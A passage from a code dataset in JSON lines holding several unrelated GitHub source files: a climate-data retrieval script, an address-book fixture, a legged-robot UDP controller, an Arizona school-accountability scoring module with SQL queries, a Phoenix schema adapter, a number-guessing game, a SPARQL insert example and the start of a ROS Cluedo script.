\"expver\": \"1\",\n \"grid\": \"0.75/0.75\",\n \"levtype\": \"sfc\",\n \"param\": \"228.128\",\n \"step\": \"12\",\n \"stream\": \"oper\",\n \"time\": \"00:00:00/12:00:00\",\n \"type\": \"fc\",\n 'format' : \"netcdf\",\n \"target\": f'erai-{year}-precip.nc',\n })\n elif var_name == 'temp':\n # configured to retrieve max 2m temperatures\n server.retrieve({\n \"class\": \"ei\",\n \"dataset\": \"interim\",\n \"date\": f'{year}-01-01/to/{year}-12-31',\n \"expver\": \"1\",\n \"grid\": \"0.75/0.75\",\n \"levtype\": \"sfc\",\n \"param\": \"201.128\",\n \"step\": \"12\",\n \"stream\": \"oper\",\n \"time\": \"00:00:00/12:00:00\",\n \"type\": \"fc\",\n 'format' : \"netcdf\",\n \"target\": f'erai-{year}-temp.nc',\n })","repo_name":"evbecker/climate-spatial-downscaling","sub_path":"data_utils/erai_retrieval.py","file_name":"erai_retrieval.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"8942775854","text":"from my_classes import AddressBook\n\n\ndef create_address_book():\n \"\"\"\n Instantiate and populate an AddressBook object\n \"\"\"\n return AddressBook({\n 'first_name': 'Henry',\n 'last_name': 'Ferguson',\n 'phone': '(555) 123-4567',\n 'email': 'henry_ferguson11882@gmail.com',\n 'birthday': {\n 'day': '12',\n 'month': '11',\n 'year': '1984',\n },\n 'address': {\n 'address1': '123 Bomb St.',\n 'address2': 'Apt. 213A',\n 'city': 'Denver',\n 'state': 'Colorado',\n 'postal_code': '80224',\n 'country': 'USA',\n },\n })\n\n\ndef add_content1(ab1):\n \"\"\"\n Add content to ab1\n \"\"\"\n ab1.add_content({\n 'first_name': 'Jeff',\n 'last_name': 'Ferguson',\n 'phone': '(555) 555-5555',\n 'email': 'jeff_ferguson7272@gmail.com',\n 'birthday': {\n 'day': '3',\n 'month': '6',\n 'year': '2011',\n },\n 'address': {\n 'address1': '123 Bomb St.',\n 'address2': 'Apt. 213A',\n 'city': 'Denver',\n 'state': 'Colorado',\n 'postal_code': '80224',\n 'country': 'USA',\n },\n })\n return ab1\n\n\ndef add_content2(ab2):\n \"\"\"\n Add content to ab2\n \"\"\"\n ab2.add_content({\n 'first_name': 'Martha',\n 'last_name': 'Ferguson',\n 'phone': '(123) 456-7890',\n 'email': 'martha_ferguson665@gmail.com',\n 'birthday': {\n 'day': '22',\n 'month': '2',\n 'year': '1987',\n },\n 'address': {\n 'address1': '321 Awesome St.',\n 'address2': 'Apt. 332B',\n 'city': 'Denver',\n 'state': 'Colorado',\n 'postal_code': '80203',\n 'country': 'USA',\n },\n })\n return ab2\n\n\ndef create_address_books():\n ab1 = create_address_book()\n ab1 = add_content1(ab1)\n ab2 = create_address_book()\n ab2 = add_content2(ab2)\n return ab1, ab2\n\n","repo_name":"ricomoss/learn-tech","sub_path":"python/presentations/override_magic_methods/setup_address_books.py","file_name":"setup_address_books.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"1039838324","text":"import socket\nimport struct\nimport threading\nimport time\nfrom typing import Union\n\nfrom robosdk.common.class_factory import ClassFactory\nfrom robosdk.common.class_factory import ClassType\nfrom robosdk.common.config import Config\nfrom robosdk.common.constant import GaitType\n\nfrom .base import LeggedControl\n\n__all__ = (\"DeepRoboticsControl\",)\n\n\nclass RobotCommander:\n \"\"\"\n Copyright (c) Deep Robotics Inc. - All Rights Reserved\n Unauthorized copying of this file, via any medium is strictly prohibited\n Proprietary and confidential\n Author: Haoyi Han , Feb, 2020\n \"\"\"\n\n _command_code = {\n \"STAND_UP_DOWN\": 1,\n \"START_FORCE_MODE\": 2,\n \"MOTION_START_STOP\": 3,\n \"DANCE\": 19,\n \"CHANGE_GAIT\": 25,\n \"HEART_BEAT\": 33\n }\n\n def __init__(self,\n local_port=20001,\n ctrl_ip='192.168.1.120',\n ctrl_port=43893):\n self.local_port = local_port\n self.server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)\n self.ctrl_addr = (ctrl_ip, ctrl_port)\n\n def __enter__(self):\n self.server.bind(('0.0.0.0', self.local_port))\n self._keep_alive = True\n self.comm_lock = threading.Lock()\n self.keep_alive_thread = threading.Thread(target=self.keep_alive,\n name=\"keep_alive\")\n self.keep_alive_thread.setDaemon(True)\n self.keep_alive_thread.start()\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.server = None\n self._keep_alive = False\n self.keep_alive_thread.join()\n\n def keep_alive(self):\n while self._keep_alive:\n self.sendSimpleCommand(\"HEART_BEAT\", verbose=False)\n time.sleep(0.25)\n\n def sendSimple(self, command_code=25, command_value=0, command_type=0):\n data = struct.pack('<3i', command_code, command_value, command_type)\n self.comm_lock.acquire()\n self.server.sendto(data, self.ctrl_addr)\n self.comm_lock.release()\n\n def sendSimpleCommand(self, command_name, verbose=True):\n self.sendSimple(self._command_code[command_name])\n\n def stand_down_up(self):\n self.sendSimpleCommand(\"STAND_UP_DOWN\")\n\n def dance(self):\n self.sendSimpleCommand(\"DANCE\")\n\n def start_force_mode(self):\n self.sendSimpleCommand(\"START_FORCE_MODE\")\n\n def motion_start_stop(self):\n self.sendSimpleCommand(\"MOTION_START_STOP\")\n\n def yaw_adjust(self, adjust_rad):\n self.sendSimple(33, int(adjust_rad * 1000))\n\n def up_stair_trait(self):\n self.sendSimple(7)\n\n def finish_up_stair_trait(self):\n self.sendSimple(7)\n\n def down_stair_trait(self):\n self.sendSimple(7)\n time.sleep(0.1)\n self.sendSimple(2)\n\n def finish_down_stair_trait(self):\n self.sendSimple(2)\n time.sleep(0.1)\n self.sendSimple(7)\n\n\n@ClassFactory.register(ClassType.CONTROL, alias=\"ysc_control\")\nclass DeepRoboticsControl(LeggedControl): # noqa\n\n def __init__(self, name: str = \"ysc\", config: Config = None):\n super(DeepRoboticsControl, self).__init__(name=name, config=config)\n\n self._GAIT_CODE = {\n 0: GaitType.LIEON,\n 1: GaitType.STAND,\n 2: GaitType.HOLD,\n 3: GaitType.TROT,\n 10: GaitType.FALL,\n 11: GaitType.UPSTAIR,\n }\n self.msg_lock = threading.RLock()\n self.curr_gait = GaitType.UNKONWN\n self.commander = RobotCommander(\n local_port=self.config.parameter.local_port,\n ctrl_port=self.config.parameter.ctrl_port,\n ctrl_ip=self.config.parameter.ctrl_ip,\n )\n parameters = getattr(self.config, \"gait_subscribe\", None) or {}\n self.gait_sub = self.backend.subscribe(\n self.config.parameter.gait_topic,\n callback=self.gait_listen, **parameters\n )\n\n def gait_listen(self, msg):\n self.msg_lock.acquire()\n if not msg:\n self.curr_gait = GaitType.UNKONWN\n else:\n data = int(msg.data)\n if data in self._GAIT_CODE:\n self.curr_gait = self._GAIT_CODE[data]\n else:\n try:\n self.curr_gait = GaitType(data)\n except ValueError:\n self.curr_gait = GaitType.UNKONWN\n self.msg_lock.release()\n\n def connect(self):\n self.commander.__enter__()\n\n def get_curr_gait(self) -> GaitType:\n return self.curr_gait\n\n def change_gait(self, gait: Union[str, GaitType]):\n if isinstance(gait, str):\n gait = getattr(GaitType, gait.upper())\n self.logger.info(f\"try to change gait to {gait.name}\")\n prev_gait = self.get_curr_gait()\n try_times = len(GaitType)\n sleep_time = 1.0 / try_times\n while try_times:\n now_gait = self.get_curr_gait()\n if now_gait == gait:\n break\n if prev_gait == now_gait:\n self.commander.sendSimple()\n time.sleep(sleep_time)\n continue\n prev_gait = now_gait\n self.commander.sendSimple()\n try_times -= 1\n time.sleep(sleep_time)\n","repo_name":"KubeEdge4Robotics/robosdk","sub_path":"robosdk/control/legged/ysc_control.py","file_name":"ysc_control.py","file_ext":"py","file_size_in_byte":5293,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"99"} +{"seq_id":"26239072377","text":"\"\"\"\nAuthors: ADE Accountability & Research\n\nLast Updated: 05/25/2023\n\nDescription: This Python module contains a Growth_to_Grad class capable of producing the results from the Growth to Graduation component of the Arizona State A-F Letter Grades \n(https://www.azed.gov/accountability-research/state-accountability). In order to calculate points, one will need to provide a version of the Accountability Static File ().\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nfrom COMPONENTS import COMPONENTS\nfrom DATABASE import DATABASE\n\n\"\"\"\nThis class contains methods for creating Pandas DataFrames that contain the Summary Growth to Graduation information present on ADEConnect for alternative schools. To find this information, navigate to \n adeconnect.azed.gov/ -> View Applications -> Accountability -> Accountability: State and Federal Profile.\n\"\"\"\nclass GTG(COMPONENTS):\n \"\"\"\n Constructor for Growth to Graduation. This class inherits from COMPONENTS, which contains variables and functionality that is shared across the different A-F Letter Grades Components.\n \"\"\"\n def __init__(self, fiscal_year:int=None, run='Prelim', **kwargs):\n \"\"\"\n Parameters:\n ----------\n fiscal_year (int): The current AZ D.O.E. fiscal year\n \"\"\"\n super().__init__(fiscal_year=fiscal_year, run=run, **kwargs)\n self.necessary_columns = [\"FiscalYear\", \"SchoolCode\", \"Alternative\"]\n self.max_persistence_points = 10\n self.max_credits_earned_points = 10\n self.max_OT2G_points = 10\n self.db = DATABASE(self.fiscal_year)\n \n \"\"\"\n This method takes a version of the Static File, obtains a list of unique alternative schools from it, and calls methods to access \n the database to obtain the necessary Persistence Rate, Credits Earned, & On Track To Graduate related results for the Growth To \n Graduation component. \n \"\"\"\n def calculate_component(self, static_file:pd.DataFrame):\n \"\"\"\n Parameters:\n ----------\n static_file (pd.DataFrame): A version of the Static File (FY 2023 or beyond). It must contain the following columns: FiscalYear, SchoolCode, Alternative\n\n Returns:\n ----------\n pd.DataFrame: A dataframe containing all of the Proficiency information that is shown in the ADEConnect State Letter Grades summary and drilldown tables. Columns contain\n suffixes that denote the page on ADEConnect in which they appear\n \"\"\"\n if not set(self.necessary_columns).issubset(static_file.columns): \n missing_columns = [x for x in self.necessary_columns if x not in static_file.columns]\n raise ValueError(f\"The DataFrame argument \\\"static_file\\\" is missing the following columns: {missing_columns}.\")\n \n # get a list of alternative schools to filter for when retrieving results from the database\n alternative_schools = list(static_file[static_file[\"Alternative\"]==1][\"SchoolCode\"].unique())\n\n # gather results\n persistence_results = self.persistence_points(alternative_schools).set_index([\"EntityID\"])\n credits_earned_results = self.credits_earned_points(alternative_schools).set_index([\"EntityID\"])\n on_track_to_graduate_results = self.on_track_to_graduate_points(alternative_schools).set_index([\"EntityID\"])\n\n # combine results\n all_results = pd.concat([persistence_results, credits_earned_results, on_track_to_graduate_results], axis=1).reset_index()\n\n # add additional point columns\n new_cols = [\"AcademicPersistence\", \"CreditsEarned\", \"OnTracktoGraduate\"]\n existing_cols = [\"GTGAcademicPersistenceTP\", \"GTGCreditsEarnedTotalpoints\", \"GTGOnTrackToGradTotalpoints\"]\n for col1, col2 in zip(new_cols, existing_cols):\n all_results[col1] = all_results[col2].copy()\n\n # add Model column\n columns = all_results.columns\n all_results[\"Model\"] = \"Alt 9-12\"\n all_results = all_results[[\"Model\"] + list(columns)] # reorder to put Model first. This is not necessary but is nice for validating\n all_results['FiscalYear'] = self.fiscal_year\n\n return all_results\n \n\n \"\"\"\n Connects to database and obtains already-calculated persistence counts and rates. Points are determined from the persistence rate.\n \"\"\"\n def persistence_points(self, alternative_schools:list):\n sql = f\"\"\"\n SELECT \n [EntityID]\n ,[PYEligibleCount] AS GTGAcademicPersistenceDen\n ,[CYEnrolledCount] AS GTGAcademicPersistenceNum\n ,[PersistenceRate]*100 AS GTGAcadPersistencePctEarned \n FROM [AccountabilityArchive].[Static].[{self.run}PersistRate{self.fiscal_year}]\n WHERE FiscalYear = {self.fiscal_year} \n AND EntityID IN {tuple(alternative_schools)}\"\"\"\n persistence_rates = self.db.read_sql_query(sql=sql)\n\n # assign points. All alt schools are eligible for points\n persistence_rates[\"GTGAcademicPersistencePctAvlbl\"] = 100\n\n # limit points\n persistence_rates[\"GTGAcademicPersistenceTP\"] = np.minimum(self.max_persistence_points, persistence_rates[\"GTGAcadPersistencePctEarned\"]/10)\n return persistence_rates\n\n \"\"\"\n Connects to database to obtain already-calculated Credits-Earned counts and points\n \"\"\"\n def credits_earned_points(self, alternative_schools:list):\n \n sql = f\"\"\"\n SELECT \n [SchoolID] AS EntityID\n , [TotalStudents] AS GTGCreditsEarnedDen\n , [TotalGraduates] AS GTGCreditsEarnedNum\n , [Points] AS GTGCreditsEarnedTotalpoints\n , [IsEligible]\n FROM [AccountabilityArchive].[Static].[{self.run}CE{self.fiscal_year}]\n WHERE FiscalYear = {self.fiscal_year} \n AND SchoolID IN {tuple(alternative_schools)}\"\"\"\n credits_earned = self.db.read_sql_query(sql=sql)\n if self.include_late_submissions:\n credits_earned = self.add_late_ce_submissions(credits_earned, alternative_schools)\n # limit points\n credits_earned[\"GTGCreditsEarnedTotalpoints\"] = np.minimum(self.max_credits_earned_points, credits_earned[\"GTGCreditsEarnedTotalpoints\"])\n\n # assign points to eligible schools\n eligible_schools = (credits_earned[\"IsEligible\"]==1)\n credits_earned.loc[eligible_schools, \"GTGCreditsEarnedPctEarned\"] = credits_earned.loc[eligible_schools, \"GTGCreditsEarnedNum\"]/credits_earned.loc[eligible_schools,\"GTGCreditsEarnedDen\"]*100\n credits_earned.loc[eligible_schools, \"GTGCreditsEarnedPctAvlbl\"] = 100\n\n # assign points to ineligible schools\n ineligible_schools = (credits_earned[\"IsEligible\"]==0)\n credits_earned.loc[ineligible_schools, [\"GTGCreditsEarnedPctEarned\", \"GTGCreditsEarnedPctAvlbl\"]] = [np.nan, np.nan]\n\n # assign points to schools that did not submit\n not_reported_schools = credits_earned[\"IsEligible\"].isna()\n credits_earned.loc[not_reported_schools, [\"GTGCreditsEarnedTotalpoints\", \"GTGCreditsEarnedPctAvlbl\"]] = [0, 100]\n credits_earned = credits_earned.drop(columns=[\"IsEligible\"])\n\n return credits_earned\n\n\n \"\"\"\n Connects to database to obtain already-calculated On-Track-To-Graduate counts and points\n \"\"\"\n def on_track_to_graduate_points(self, alternative_schools:list):\n sql = f\"\"\"\n SELECT \n [SchoolID] AS EntityID\n , [TotalStudents] AS GTGOnTrackToGradDen\n , [TotalGraduates] AS GTGOnTrackToGradNum\n , [Points] AS GTGOnTrackToGradTotalpoints\n , [IsEligible]\n FROM [AccountabilityArchive].[Static].[{self.run}OTG{self.fiscal_year}]\n WHERE FiscalYear = {self.fiscal_year} \n AND SchoolID IN {tuple(alternative_schools)}\n \"\"\"\n on_track_to_graduate = self.db.read_sql_query(sql=sql)\n if self.include_late_submissions:\n on_track_to_graduate = self.add_late_otg_submissions(on_track_to_graduate, alternative_schools)\n # limit points\n on_track_to_graduate[\"GTGOnTrackToGradTotalpoints\"] = np.minimum(self.max_OT2G_points, on_track_to_graduate[\"GTGOnTrackToGradTotalpoints\"])\n\n # assign points to eligible schools\n eligible_schools = (on_track_to_graduate[\"IsEligible\"]==1)\n on_track_to_graduate.loc[eligible_schools, \"GTGOnTrackToGradPctEarned\"] = on_track_to_graduate.loc[eligible_schools, \"GTGOnTrackToGradNum\"]/on_track_to_graduate.loc[eligible_schools, \"GTGOnTrackToGradDen\"]*100\n on_track_to_graduate.loc[eligible_schools, \"GTGOnTrackToGradPctAvlbl\"] = 100\n\n # assign points to ineligible schools\n ineligible_schools = (on_track_to_graduate[\"IsEligible\"]==0)\n on_track_to_graduate.loc[ineligible_schools, [\"GTGOnTrackToGradPctEarned\", \"GTGOnTrackToGradPctAvlbl\"]] = [np.nan, np.nan]\n\n # assign points to schools that did not submit\n not_reported_schools = on_track_to_graduate[\"IsEligible\"].isna()\n on_track_to_graduate.loc[not_reported_schools, [\"GTGOnTrackToGradTotalpoints\", \"GTGOnTrackToGradPctAvlbl\"]] = [0, 100]\n\n on_track_to_graduate = on_track_to_graduate.drop(columns=[\"IsEligible\"]) # drop eligibility column since we do not report it\n\n return on_track_to_graduate\n \n def fetch_late_otg_submissions(self, alternative_schools):\n db = DATABASE(fiscal_year=self.fiscal_year, database='AccountabilityArchive', schema='dbo', run='', server_name='AACTASTPDDBVM02')\n sql = f\"\"\"select \n [SchoolID] AS EntityID\n , n_stu_elig AS GTGOnTrackToGradDen\n , n_stu_met AS GTGOnTrackToGradNum\n , [Points] AS GTGOnTrackToGradTotalpoints\n , [IsEligible]\n FROM [AccountabilityArchive].[dbo].[LateLateSelfReportedData]\n Where FiscalYear={self.fiscal_year} and type='otg'\n AND SchoolID IN {tuple(alternative_schools)}\"\"\"\n late_otg = db.read_sql_query(sql=sql)\n return late_otg\n \n def add_late_otg_submissions(self, on_track_to_graduate, alternative_schools):\n \n late_otg = self.fetch_late_otg_submissions(alternative_schools)\n late_otg['IsEligible'] = late_otg['IsEligible'].apply(lambda x: True if x==1 else False)\n \n #delete the late submission value from original table and add new data\n on_track_to_graduate = on_track_to_graduate[~on_track_to_graduate.EntityID.isin(late_otg.EntityID)].copy()\n on_track_to_graduate = pd.concat([on_track_to_graduate, late_otg], axis=0)\n \n return on_track_to_graduate\n \n def fetch_late_ce_submissions(self, alternative_schools):\n db = DATABASE(fiscal_year=self.fiscal_year, database='AccountabilityArchive', schema='dbo', run='', server_name='AACTASTPDDBVM02')\n sql = f\"\"\"select \n [SchoolID] AS EntityID\n , n_stu_elig AS GTGCreditsEarnedDen\n , n_stu_met AS GTGCreditsEarnedNum\n , [Points] AS GTGCreditsEarnedTotalpoints\n , [IsEligible]\n FROM [AccountabilityArchive].[dbo].[LateLateSelfReportedData]\n Where FiscalYear={self.fiscal_year} and type='CE'\n AND SchoolID IN {tuple(alternative_schools)}\"\"\"\n late_ce = db.read_sql_query(sql=sql)\n return late_ce\n \n def add_late_ce_submissions(self, credits_earned, alternative_schools):\n \n late_ce = self.fetch_late_ce_submissions(alternative_schools)\n late_ce['IsEligible'] = late_ce['IsEligible'].apply(lambda x: True if x==1 else False)\n \n #delete the late submission value from original table and add new data\n credits_earned = credits_earned[~credits_earned.EntityID.isin(late_ce.EntityID)].copy()\n credits_earned = pd.concat([credits_earned, late_ce], axis=0)\n \n return credits_earned\n \n\n\n# fy= 2023\n# run = 'PrelimV6'\n# self = GTG(fy, run)\n# staticfile = DATABASE(fiscal_year = fy\n# ,run = run\n# ,schema = 'Static'\n# ,database = 'AccountabilityArchive').read_table(table_name ='StaticFile')\n# static_file = staticfile.copy()\n","repo_name":"Yassinfahmy/ArizonaDepartmentofEducation","sub_path":"StateCode/GTG.py","file_name":"GTG.py","file_ext":"py","file_size_in_byte":12327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"11488164097","text":"from itertools import chain\nfrom operator import itemgetter\nfrom typing import Dict, Iterable, List, Optional, Sized, Tuple, Union\n\nimport pandas as pd\nfrom pandas.api.types import is_object_dtype\nfrom typing_extensions import TypeAlias, TypeGuard\n\nfrom phoenix import Dataset, EmbeddingColumnNames\nfrom phoenix.core.model import _get_embedding_dimensions\nfrom phoenix.core.model_schema import Embedding, Model, RetrievalEmbedding, Schema\nfrom phoenix.datasets.schema import RetrievalEmbeddingColumnNames\nfrom phoenix.datasets.schema import Schema as DatasetSchema\n\nDatasetName: TypeAlias = str\nColumnName: TypeAlias = str\nDisplayName: TypeAlias = str\n\n\ndef create_model_from_datasets(*datasets: Optional[Dataset]) -> Model:\n # TODO: move this validation into model_schema.Model.\n if len(datasets) > 1 and datasets[0] is not None:\n # Check that for each embedding dimension all vectors\n # have the same length between datasets.\n _ = _get_embedding_dimensions(datasets[0], datasets[1])\n\n named_dataframes: List[Tuple[DatasetName, pd.DataFrame]] = []\n prediction_ids: List[ColumnName] = []\n timestamps: List[ColumnName] = []\n prediction_labels: List[ColumnName] = []\n prediction_scores: List[ColumnName] = []\n actual_labels: List[ColumnName] = []\n actual_scores: List[ColumnName] = []\n features: List[ColumnName] = []\n tags: List[ColumnName] = []\n embeddings: Dict[DisplayName, EmbeddingColumnNames] = {}\n prompts: List[EmbeddingColumnNames] = []\n responses: List[Union[str, EmbeddingColumnNames]] = []\n\n for dataset in filter(_is_dataset, datasets):\n df = dataset.dataframe\n # Coerce string column names at run time.\n df = df.set_axis(\n map(str, df.columns),\n axis=1,\n )\n named_dataframes.append((dataset.name, df))\n dataset_schema = dataset.schema if dataset.schema is not None else DatasetSchema()\n for display_name, embedding in (\n dataset_schema.embedding_feature_column_names or {}\n ).items():\n if display_name not in embeddings:\n embeddings[display_name] = embedding\n if dataset_schema.prompt_column_names is not None:\n prompts.append(dataset_schema.prompt_column_names)\n if dataset_schema.response_column_names is not None:\n responses.append(dataset_schema.response_column_names)\n for source, sink in (\n ([dataset_schema.prediction_id_column_name], prediction_ids),\n ([dataset_schema.timestamp_column_name], timestamps),\n ([dataset_schema.prediction_label_column_name], prediction_labels),\n ([dataset_schema.prediction_score_column_name], prediction_scores),\n ([dataset_schema.actual_label_column_name], actual_labels),\n ([dataset_schema.actual_score_column_name], actual_scores),\n (dataset_schema.feature_column_names or (), features),\n (dataset_schema.tag_column_names or (), tags),\n ):\n # Coerce None to \"\" to simplify type checks.\n sink.extend(map(lambda s: \"\" if s is None else str(s), source))\n\n # Deduplicate and remove \"\"\n tags = list(set(filter(bool, tags)))\n features = list(set(filter(bool, features)))\n\n # Consolidate column names, by renaming if necessary.\n for specified_column_names in (\n prediction_ids,\n timestamps,\n prediction_labels,\n prediction_scores,\n actual_labels,\n actual_scores,\n ):\n assert len(specified_column_names) == len(named_dataframes)\n if len(set(filter(bool, specified_column_names))) > 1:\n # Rename all columns to match that of the first dataframe.\n pinned_column_name = _take_first_str(specified_column_names)\n for i in range(len(named_dataframes)):\n df_name, df = named_dataframes[i]\n old_column_name = specified_column_names[i]\n if old_column_name and old_column_name in df.columns:\n named_dataframes[i] = (\n df_name,\n df.rename(\n {old_column_name: pinned_column_name},\n axis=1,\n ),\n )\n\n translated_embeddings = (\n _translate_embedding(embedding, display_name)\n for display_name, embedding in embeddings.items()\n )\n\n return Schema(\n prediction_id=_take_first_str(prediction_ids),\n timestamp=_take_first_str(timestamps),\n prediction_label=_take_first_str(prediction_labels),\n prediction_score=_take_first_str(prediction_scores),\n actual_label=_take_first_str(actual_labels),\n actual_score=_take_first_str(actual_scores),\n features=chain(\n *_split_vectors_vs_scalars(\n features,\n *map(itemgetter(1), named_dataframes),\n ),\n translated_embeddings,\n ),\n tags=chain(\n *_split_vectors_vs_scalars(\n tags,\n *map(itemgetter(1), named_dataframes),\n )\n ),\n prompt=next(map(_translate_prompt_embedding, prompts), None),\n response=next(map(_translate_response_embedding, responses), None),\n )(\n *named_dataframes,\n timestamps_already_normalized=True,\n df_already_sorted_by_time=True,\n df_already_validated=True,\n )\n\n\ndef _is_dataset(obj: Optional[Dataset]) -> TypeGuard[Dataset]:\n return type(obj) is Dataset\n\n\ndef _take_first_str(iterator: Iterable[str]) -> str:\n return next(iter(filter(bool, iterator)), \"\")\n\n\ndef _translate_embedding(\n embedding: EmbeddingColumnNames,\n display_name: Optional[str] = None,\n) -> Embedding:\n return Embedding(\n vector=embedding.vector_column_name,\n raw_data=embedding.raw_data_column_name,\n link_to_data=embedding.link_to_data_column_name,\n display_name=display_name,\n )\n\n\ndef _translate_response_embedding(\n embedding: Union[str, EmbeddingColumnNames],\n display_name: Optional[str] = None,\n) -> Union[str, Embedding]:\n if isinstance(embedding, EmbeddingColumnNames):\n return _translate_embedding(embedding, display_name)\n return embedding\n\n\ndef _translate_prompt_embedding(\n embedding: Union[EmbeddingColumnNames, RetrievalEmbeddingColumnNames],\n display_name: Optional[str] = None,\n) -> RetrievalEmbedding:\n return RetrievalEmbedding(\n vector=embedding.vector_column_name,\n raw_data=embedding.raw_data_column_name,\n link_to_data=embedding.link_to_data_column_name,\n display_name=display_name,\n context_retrieval_ids=embedding.context_retrieval_ids_column_name\n if isinstance(embedding, RetrievalEmbeddingColumnNames)\n else None,\n context_retrieval_scores=embedding.context_retrieval_scores_column_name\n if isinstance(embedding, RetrievalEmbeddingColumnNames)\n else None,\n )\n\n\ndef _split_vectors_vs_scalars(\n names: Iterable[str],\n *dataframes: pd.DataFrame,\n) -> Tuple[List[str], List[Embedding]]:\n \"\"\"A best-effort attempt at separating vector columns from scalar columns\n by examining the first non-null item of the column from each dataframe. If\n any item is `Iterable` and `Sized`, but not `str`, then the column is\n returned as `Embedding`, else it's returned as scalar.\n \"\"\"\n scalars: List[str] = []\n vectors: List[Embedding] = []\n # convert to sets for a speedier lookup\n column_names = [set(df.columns) for df in dataframes]\n for name in names:\n for i, df in enumerate(dataframes):\n if df.empty or name not in column_names[i]:\n continue\n series = df.loc[:, name]\n if not is_object_dtype(series):\n continue\n item = series.iat[series.isna().argmin()]\n if (\n isinstance(item, str) # str is scalar, but Iterable\n or not isinstance(item, Iterable)\n or not isinstance(item, Sized)\n ):\n continue\n vectors.append(Embedding(vector=name))\n break\n else:\n scalars.append(name)\n return scalars, vectors\n","repo_name":"Arize-ai/phoenix","sub_path":"src/phoenix/core/model_schema_adapter.py","file_name":"model_schema_adapter.py","file_ext":"py","file_size_in_byte":8268,"program_lang":"python","lang":"en","doc_type":"code","stars":1662,"dataset":"github-code","pt":"99"} +{"seq_id":"29194050752","text":"'''\n You Think. I'll guess.\n This is a guess the number game.\n the user can think of a number and this program can guess it.\n'''\n#User's name\nprint(\"Hello! What is your name?\")\nusername = input()\n\n#the range of numbers to guess from\nprint(username + \", Please Think of a number, and i will guess it\")\nprint(\"Now, Tell me the range of numbers to guess from\")\nlow = int(input(\"the minimum is: \"))\nhigh = int(input(\"the maximum is: \"))\n\n#Bisection Algorithm\nmedium =(low + high)//2\nstate = True\n\nwhile state :\n print(\"Is your secret number is \" + str(medium)+ \"?!\")\n guess = input(\"Enter 'H' if it was too high.\\nEnter 'l' if it was too low.\\nEnter 'c' if it was correct :\")\n if guess =='c' :\n print(\"Game over, your secrert number is \"+ str(medium))\n state = False\n elif guess =='h' :\n high = medium\n medium =(low + high)//2\n\n elif guess == 'l' :\n low = medium\n medium =(low + high)//2\n else :\n print(\"Sorry, i can't understand you.\")\n \n","repo_name":"ayaabuelsoud/Guessing-the-number-Game","sub_path":"You Think. I'll guess.py","file_name":"You Think. I'll guess.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"14955644080","text":"from jinja2 import Environment, FileSystemLoader\nfrom SPARQLWrapper import SPARQLWrapper, POST\n\nfrom pathlib import Path\n\n\ndef exec():\n\n env = Environment(\n loader=FileSystemLoader(\n Path(__file__).parent))\n\n template = env.get_template('insert.sparql')\n\n data = {'s': '愛知県', 'p': 'wikiPageWikiLink'}\n query = template.render(data)\n\n sparql = SPARQLWrapper(\n endpoint='http://localhost:3030/ddd/update',\n returnFormat='json'\n )\n\n sparql.setMethod(POST)\n\n sparql.setQuery(query)\n\n #return query\n\n return sparql.query().convert()\n\n\nif __name__ == '__main__':\n\n print(exec())\n","repo_name":"inutomo0123/setup-sparqlwrapper","sub_path":"samples/fuseki/insert.py","file_name":"insert.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"7988199714","text":"#!/usr/bin/env python\n\nimport roslib\nimport rospy\nimport smach\nimport smach_ros\nimport time\nimport itertools\nimport random\nimport copy\nimport numpy as np\nfrom armor_msgs.msg import * \nfrom armor_msgs.srv import * \n\n\n# Initialize the game\nwho_list_full = [ \"White\", \"Green\", \"Peacock\", \"Plum\", \"Scarlet\", \"Mustard\"]\nwhere_list_full = [\"Kitchen\", \"Hall\", \"Ballroom\", \"Conservatory\", \"Dining\", \"Billiard\", \"Library\", \"Lounge\", \"Study\"]\nwhat_list_full = [ \"Candlestick\", \"Revolver\", \"Knife\", \"Pipe\", \"Rope\", \"Wrench\"]\n\nclasses = [\"PERSON\", \"PLACE\", \"WEAPON\"]\n\ncheck_protege = \"/root/ros_ws/src/cluedo_exp/ontology/check.owl\"\nontology_path ='/root/ros_ws/src/cluedo_exp/ontology/cluedo_ontology.owl'\n\narmor_service = None\n\nroom_number = rospy.get_param('room_number')\n\n# Initialize the entity list for ontology definition\nwho_list = copy.deepcopy(who_list_full) \nwhere_list = copy.deepcopy(where_list_full) \nwhat_list = copy.deepcopy(what_list_full)\n\ndef solution_creator():\n # Randomly select the solution\n \n who_sol = random.choice(who_list)\n where_sol = random.choice(where_list)\n what_sol = random.choice(what_list) \n \n solution = [who_sol, where_sol, what_sol]\t\n\t\n return(solution)\n \ndef solution_upload(list_of_hints):\n\n who = list_of_hints[0]\n where = list_of_hints[1]\n what = list_of_hints[2]\n \n # Create the individuals\n add_entity(who, classes[0])\n add_entity(where, classes[1])\n add_entity(what, classes[2])\n \n # Create the only hypothesis\n print(\"This is a spoil...\")\n print(list_of_hints)\n time.sleep(5)\n hypothesis = sorted([list_of_hints])\n \n # Generate the only possibe hypothesis\n hypotesis_generator(hypothesis)\n \n sol_ID = \"HP0\"\n rospy.set_param('solution_ID', sol_ID) \n print(sol_ID)\n \n # print(\"The killer is %s in the %s with the %s\" %(who, where, what))\n \ndef load_file(ontology_path):\n\n try:\n \n req = ArmorDirectiveReq()\n req.client_name = 'tutorial'\n req.reference_name = 'ontoTest'\n req.command = 'LOAD'\n req.primary_command_spec = 'FILE'\n req.secondary_command_spec = ''\n req.args = [ontology_path, 'http://www.emarolab.it/cluedo-ontology', 'true', 'PELLET', 'true']\n msg = armor_service(req)\n res = msg.armor_response\n \n print(\"Ontology loaded!\")\n except: \n raise ValueError('Ontology NOT loaded !') \n \ndef add_entity(instance, class_type):\n\n try: \n \n req = ArmorDirectiveReq()\n req.client_name = 'tutorial'\n req.reference_name = 'ontoTest'\n req.command = 